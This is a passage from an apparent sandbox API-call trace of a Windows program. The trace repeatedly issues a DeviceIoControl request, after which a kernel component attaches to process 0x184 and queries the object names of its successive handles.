PriorityBoost=0) [0221.371] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.371] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.371] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.371] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.371] PsAcquireProcessExitSynchronization () returned 0x0 [0221.371] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.371] ObReferenceObjectByHandle (in: Handle=0x184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000f55bd0, HandleInformation=0x0) returned 0x0 [0221.371] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.371] PsReleaseProcessExitSynchronization () returned 0x2 [0221.371] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.371] ObQueryNameString (in: Object=0xfffff8a000f55bd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.371] ObfDereferenceObject (Object=0xfffff8a000f55bd0) returned 0x1 [0221.371] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.371] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.372] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.372] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.372] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.372] PsAcquireProcessExitSynchronization () returned 0x0 [0221.372] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.372] ObReferenceObjectByHandle (in: Handle=0x1bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010e9270, HandleInformation=0x0) returned 0x0 [0221.372] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.372] PsReleaseProcessExitSynchronization () returned 0x2 [0221.372] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.372] ObQueryNameString (in: Object=0xfffff8a0010e9270, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.372] ObfDereferenceObject (Object=0xfffff8a0010e9270) returned 0x1 [0221.372] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.372] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.372] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.372] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.372] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.372] PsAcquireProcessExitSynchronization () returned 0x0 [0221.373] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.373] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010fb850, HandleInformation=0x0) returned 0x0 [0221.373] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.373] PsReleaseProcessExitSynchronization () returned 0x2 [0221.373] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.373] ObQueryNameString (in: Object=0xfffff8a0010fb850, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.373] ObfDereferenceObject (Object=0xfffff8a0010fb850) returned 0x1 [0221.373] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.373] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.373] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.373] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.373] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.373] PsAcquireProcessExitSynchronization () returned 0x0 [0221.373] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.373] ObReferenceObjectByHandle (in: Handle=0x1dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ca14f0, HandleInformation=0x0) returned 0x0 [0221.373] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.374] PsReleaseProcessExitSynchronization () returned 0x2 [0221.374] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.374] ObQueryNameString (in: Object=0xfffff8a000ca14f0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.374] ObfDereferenceObject (Object=0xfffff8a000ca14f0) returned 0x1 [0221.374] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.374] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.374] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.374] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.374] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.374] PsAcquireProcessExitSynchronization () returned 0x0 [0221.374] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.374] ObReferenceObjectByHandle (in: Handle=0x1ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0089fbe90, HandleInformation=0x0) returned 0x0 [0221.374] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.374] PsReleaseProcessExitSynchronization () returned 0x2 [0221.374] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.374] ObQueryNameString (in: Object=0xfffff8a0089fbe90, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.374] ObfDereferenceObject (Object=0xfffff8a0089fbe90) returned 0x1 [0221.374] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.374] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.374] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.375] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.375] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.375] PsAcquireProcessExitSynchronization () returned 0x0 [0221.375] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.375] ObReferenceObjectByHandle (in: Handle=0x1f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00111bd00, HandleInformation=0x0) returned 0x0 [0221.375] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.375] PsReleaseProcessExitSynchronization () returned 0x2 [0221.375] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.375] ObQueryNameString (in: Object=0xfffff8a00111bd00, ObjectNameInfo=0xfffffa800315b7c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800315b7c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.375] ObfDereferenceObject (Object=0xfffff8a00111bd00) returned 0x1 [0221.375] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.375] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.375] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.375] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.376] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.376] PsAcquireProcessExitSynchronization () returned 0x0 [0221.376] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.376] ObReferenceObjectByHandle (in: Handle=0x1f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001187a40, HandleInformation=0x0) returned 0x0 [0221.376] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.376] PsReleaseProcessExitSynchronization () returned 0x2 [0221.376] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.376] ObQueryNameString (in: Object=0xfffff8a001187a40, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.376] ObfDereferenceObject (Object=0xfffff8a001187a40) returned 0x1 [0221.376] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.376] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.376] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.376] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.376] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.376] PsAcquireProcessExitSynchronization () returned 0x0 [0221.376] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.376] ObReferenceObjectByHandle (in: Handle=0x1fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ca62d0, HandleInformation=0x0) returned 0x0 [0221.376] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.376] PsReleaseProcessExitSynchronization () returned 0x2 [0221.376] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.376] ObQueryNameString (in: Object=0xfffff8a000ca62d0, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.376] ObfDereferenceObject (Object=0xfffff8a000ca62d0) returned 0x1 [0221.376] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.377] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.377] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.377] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.377] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.377] PsAcquireProcessExitSynchronization () returned 0x0 [0221.377] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.377] ObReferenceObjectByHandle (in: Handle=0x200, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0011c6890, HandleInformation=0x0) returned 0x0 [0221.377] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.377] PsReleaseProcessExitSynchronization () returned 0x2 [0221.377] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.377] ObQueryNameString (in: Object=0xfffff8a0011c6890, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.377] ObfDereferenceObject (Object=0xfffff8a0011c6890) returned 0x1 [0221.377] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.378] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.378] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.378] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.378] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.378] PsAcquireProcessExitSynchronization () returned 0x0 [0221.378] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.378] ObReferenceObjectByHandle (in: Handle=0x208, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0011a3fc0, HandleInformation=0x0) returned 0x0 [0221.378] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.378] PsReleaseProcessExitSynchronization () returned 0x2 [0221.378] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.379] ObQueryNameString (in: Object=0xfffff8a0011a3fc0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.379] ObfDereferenceObject (Object=0xfffff8a0011a3fc0) returned 0x1 [0221.379] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.379] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.379] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.379] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.379] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.379] PsAcquireProcessExitSynchronization () returned 0x0 [0221.379] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.379] ObReferenceObjectByHandle (in: Handle=0x210, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0019f4af0, HandleInformation=0x0) returned 0x0 [0221.379] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.379] PsReleaseProcessExitSynchronization () returned 0x2 [0221.379] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.379] ObQueryNameString (in: Object=0xfffff8a0019f4af0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.379] ObfDereferenceObject (Object=0xfffff8a0019f4af0) returned 0x1 [0221.379] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.379] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.380] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.380] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.380] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.380] PsAcquireProcessExitSynchronization () returned 0x0 [0221.380] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.380] ObReferenceObjectByHandle (in: Handle=0x220, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001055e60, HandleInformation=0x0) returned 0x0 [0221.380] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.380] PsReleaseProcessExitSynchronization () returned 0x2 [0221.380] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.380] ObQueryNameString (in: Object=0xfffff8a001055e60, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.380] ObfDereferenceObject (Object=0xfffff8a001055e60) returned 0x1 [0221.380] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.381] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.381] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.381] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.381] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.381] PsAcquireProcessExitSynchronization () returned 0x0 [0221.381] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.381] ObReferenceObjectByHandle (in: Handle=0x22c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00105bac0, HandleInformation=0x0) returned 0x0 [0221.381] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.381] PsReleaseProcessExitSynchronization () returned 0x2 [0221.381] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.381] ObQueryNameString (in: Object=0xfffff8a00105bac0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.381] ObfDereferenceObject (Object=0xfffff8a00105bac0) returned 0x1 [0221.381] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.381] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.381] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.381] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.381] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.381] PsAcquireProcessExitSynchronization () returned 0x0 [0221.381] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.381] ObReferenceObjectByHandle (in: Handle=0x248, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013268c0, HandleInformation=0x0) returned 0x0 [0221.382] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.382] PsReleaseProcessExitSynchronization () returned 0x2 [0221.382] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.382] ObQueryNameString (in: Object=0xfffff8a0013268c0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.382] ObfDereferenceObject (Object=0xfffff8a0013268c0) returned 0x1 [0221.382] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.382] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.382] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.382] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.382] PsAcquireProcessExitSynchronization () returned 0x0 [0221.382] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.382] ObReferenceObjectByHandle (in: Handle=0x24c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0012c2e70, HandleInformation=0x0) returned 0x0 [0221.382] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.382] PsReleaseProcessExitSynchronization () returned 0x2 [0221.382] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x182 [0221.383] ObQueryNameString (in: Object=0xfffff8a0012c2e70, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.383] ObfDereferenceObject (Object=0xfffff8a0012c2e70) returned 0x1 [0221.383] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.383] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.383] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.383] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, 